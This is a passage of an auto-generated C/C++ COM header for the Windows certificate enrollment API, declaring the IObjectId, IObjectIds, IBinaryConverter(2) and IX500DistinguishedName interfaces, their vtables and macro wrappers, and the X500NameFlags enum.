            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName);
        
        END_INTERFACE
    } IObjectIdVtbl;

    interface IObjectId
    {
        CONST_VTBL struct IObjectIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectId_InitializeFromName(This,Name)	\
    ( (This)->lpVtbl -> InitializeFromName(This,Name) ) 

#define IObjectId_InitializeFromValue(This,strValue)	\
    ( (This)->lpVtbl -> InitializeFromValue(This,strValue) ) 

#define IObjectId_InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName)	\
    ( (This)->lpVtbl -> InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName) ) 

#define IObjectId_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IObjectId_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IObjectId_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IObjectId_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IObjectId_GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName)	\
    ( (This)->lpVtbl -> GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectId_INTERFACE_DEFINED__ */


#ifndef __IObjectIds_INTERFACE_DEFINED__
#define __IObjectIds_INTERFACE_DEFINED__

/* interface IObjectIds */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectIds;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab301-217d-11da-b2a4-000e7bbb2b09")
    IObjectIds : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IObjectId *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IObjectIdsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectIds * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectIds * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectIds * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectIds * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectId *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        END_INTERFACE
    } IObjectIdsVtbl;

    interface IObjectIds
    {
        CONST_VTBL struct IObjectIdsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectIds_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectIds_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectIds_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectIds_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectIds_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectIds_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectIds_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectIds_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IObjectIds_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IObjectIds_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IObjectIds_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IObjectIds_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IObjectIds_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IObjectIds_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectIds_INTERFACE_DEFINED__ */


#ifndef __IBinaryConverter_INTERFACE_DEFINED__
#define __IBinaryConverter_INTERFACE_DEFINED__

/* interface IBinaryConverter */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IBinaryConverter;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab302-217d-11da-b2a4-000e7bbb2b09")
    IBinaryConverter : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StringToString( 
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VariantByteArrayToString( 
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE StringToVariantByteArray( 
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IBinaryConverterVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IBinaryConverter * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IBinaryConverter * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IBinaryConverter * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IBinaryConverter * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *StringToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *VariantByteArrayToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *StringToVariantByteArray )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray);
        
        END_INTERFACE
    } IBinaryConverterVtbl;

    interface IBinaryConverter
    {
        CONST_VTBL struct IBinaryConverterVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IBinaryConverter_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IBinaryConverter_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IBinaryConverter_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IBinaryConverter_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IBinaryConverter_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IBinaryConverter_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IBinaryConverter_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IBinaryConverter_StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded) ) 

#define IBinaryConverter_VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded) ) 

#define IBinaryConverter_StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray)	\
    ( (This)->lpVtbl -> StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IBinaryConverter_INTERFACE_DEFINED__ */


#ifndef __IBinaryConverter2_INTERFACE_DEFINED__
#define __IBinaryConverter2_INTERFACE_DEFINED__

/* interface IBinaryConverter2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IBinaryConverter2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("8D7928B4-4E17-428D-9A17-728DF00D1B2B")
    IBinaryConverter2 : public IBinaryConverter
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StringArrayToVariantArray( 
            /* [in] */ __RPC__in VARIANT *pvarStringArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarVariantArray) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VariantArrayToStringArray( 
            /* [in] */ __RPC__in VARIANT *pvarVariantArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarStringArray) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IBinaryConverter2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IBinaryConverter2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IBinaryConverter2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IBinaryConverter2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IBinaryConverter2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *StringToString )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *VariantByteArrayToString )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *StringToVariantByteArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray);
        
        HRESULT ( STDMETHODCALLTYPE *StringArrayToVariantArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarStringArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarVariantArray);
        
        HRESULT ( STDMETHODCALLTYPE *VariantArrayToStringArray )( 
            __RPC__in IBinaryConverter2 * This,
            /* [in] */ __RPC__in VARIANT *pvarVariantArray,
            /* [retval][out] */ __RPC__out VARIANT *pvarStringArray);
        
        END_INTERFACE
    } IBinaryConverter2Vtbl;

    interface IBinaryConverter2
    {
        CONST_VTBL struct IBinaryConverter2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IBinaryConverter2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IBinaryConverter2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IBinaryConverter2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IBinaryConverter2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IBinaryConverter2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IBinaryConverter2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IBinaryConverter2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IBinaryConverter2_StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded) ) 

#define IBinaryConverter2_VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded) ) 

#define IBinaryConverter2_StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray)	\
    ( (This)->lpVtbl -> StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray) ) 


#define IBinaryConverter2_StringArrayToVariantArray(This,pvarStringArray,pvarVariantArray)	\
    ( (This)->lpVtbl -> StringArrayToVariantArray(This,pvarStringArray,pvarVariantArray) ) 

#define IBinaryConverter2_VariantArrayToStringArray(This,pvarVariantArray,pvarStringArray)	\
    ( (This)->lpVtbl -> VariantArrayToStringArray(This,pvarVariantArray,pvarStringArray) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IBinaryConverter2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0004 */
/* [local] */ 

typedef 
enum X500NameFlags
    {
        XCN_CERT_NAME_STR_NONE	= 0,
        XCN_CERT_SIMPLE_NAME_STR	= 1,
        XCN_CERT_OID_NAME_STR	= 2,
        XCN_CERT_X500_NAME_STR	= 3,
        XCN_CERT_XML_NAME_STR	= 4,
        XCN_CERT_NAME_STR_SEMICOLON_FLAG	= 0x40000000,
        XCN_CERT_NAME_STR_NO_PLUS_FLAG	= 0x20000000,
        XCN_CERT_NAME_STR_NO_QUOTING_FLAG	= 0x10000000,
        XCN_CERT_NAME_STR_CRLF_FLAG	= 0x8000000,
        XCN_CERT_NAME_STR_COMMA_FLAG	= 0x4000000,
        XCN_CERT_NAME_STR_REVERSE_FLAG	= 0x2000000,
        XCN_CERT_NAME_STR_FORWARD_FLAG	= 0x1000000,
        XCN_CERT_NAME_STR_AMBIGUOUS_SEPARATOR_FLAGS	= ( ( 0x40000000 | 0x8000000 )  | 0x4000000 ) ,
        XCN_CERT_NAME_STR_DISABLE_IE4_UTF8_FLAG	= 0x10000,
        XCN_CERT_NAME_STR_ENABLE_T61_UNICODE_FLAG	= 0x20000,
        XCN_CERT_NAME_STR_ENABLE_UTF8_UNICODE_FLAG	= 0x40000,
        XCN_CERT_NAME_STR_FORCE_UTF8_DIR_STR_FLAG	= 0x80000,
        XCN_CERT_NAME_STR_DISABLE_UTF8_DIR_STR_FLAG	= 0x100000,
        XCN_CERT_NAME_STR_ENABLE_PUNYCODE_FLAG	= 0x200000,
        XCN_CERT_NAME_STR_DS_ESCAPED	= 0x800000
    } 	X500NameFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_s_ifspec;

#ifndef __IX500DistinguishedName_INTERFACE_DEFINED__
#define __IX500DistinguishedName_INTERFACE_DEFINED__

/* interface IX500DistinguishedName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX500DistinguishedName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab303-217d-11da-b2a4-000e7bbb2b09")
    IX500DistinguishedName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Decode( 
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Encode( 
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedName( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX500DistinguishedNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX500DistinguishedName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX500DistinguishedName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX500DistinguishedName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX500DistinguishedName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Decode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX500DistinguishedName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedName )( 
            __RPC__in IX500DistinguishedName * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX500DistinguishedNameVtbl;

    interface IX500DistinguishedName
    {
        CONST_VTBL struct IX500DistinguishedNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX500DistinguishedName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX500DistinguishedName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX500DistinguishedName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX500DistinguishedName_GetTypeInfoCount(This,pctinfo)	\
